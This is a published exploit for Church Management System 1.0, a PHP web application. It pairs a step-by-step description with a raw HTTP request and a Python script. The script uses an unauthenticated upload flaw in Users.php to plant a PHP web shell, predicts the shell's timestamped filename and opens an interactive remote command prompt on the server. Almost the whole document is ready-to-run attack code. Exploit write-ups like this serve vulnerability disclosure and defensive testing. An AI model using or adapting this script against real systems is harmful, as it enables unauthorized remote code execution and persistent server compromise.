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# Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja # Date: 2021-09-20 # Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip # Version: 1.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # Exploit Details: # 1. Access the 'classes/Users.php', as it does not check for an authenticated user session. # 2. Set the 'f' parameter of the POST request to 'save'. # - `Users.php?f=save` # 3. Capture request in burp and replace with with following request. ''' POST /church_management/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550 Content-Length: 859 Origin: http://localhost Connection: close Referer: http://localhost/church_management/admin/?page=user Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="id" 1 -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="firstname" Adminstrator -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="lastname" Admin -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="username" admin -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="password" -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="img"; filename="phpinfo.php" Content-Type: application/octet-stream <?php echo phpinfo(); ?> -----------------------------91105564325608762312322546550-- ''' # ` Image uploader is renaming your payload using the following function. # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler # and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200 # concate output with your playload name like this 1632085200_phpinfo.php # 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests. # RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Church Management System v1.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" .----------. .-''-. / / . __ __ ___ .' .-. ) / ______.' .'| | |/ `.' `. / .' / / / /_ .' | | .-. .-. ' (_/ / / / '''--. < | __ __ | | | | | | ,.----------. / / '___ `. | | ____ .:--.'. .:--.'. | | | | | |// \ / / `'. | | | \ .' / | \ | / | \ || | | | | |\\ /. ' ) | | |/ . `" __ | | `" __ | || | | | | | `'----------'/ / _.-')......-' / | /\ \ .'.''| | .'.''| ||__| |__| |__| .' ' _.'.-'' \ _..'` | | \ \ / / | |_/ / | |_ / /.-'_.' '------''' ' \ \ \ \ \._,\ '/\ \._,\ '/ / _.' '------' '---'`--' `" `--' `" ( _.-' abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #Create a new session #proxies = {'http': '', 'https': ''} s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'uploads/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'img': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''} def id_generator(): x = datetime.datetime.now() date_string = x.strftime("%y-%m-%d %H:%M") date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") timestamp = datetime.datetime.timestamp(date) file = int(timestamp) final_name = str(file)+'_shell.php' return final_name filename = id_generator() #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data) shell_upload = True if("Undefined index: id in" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)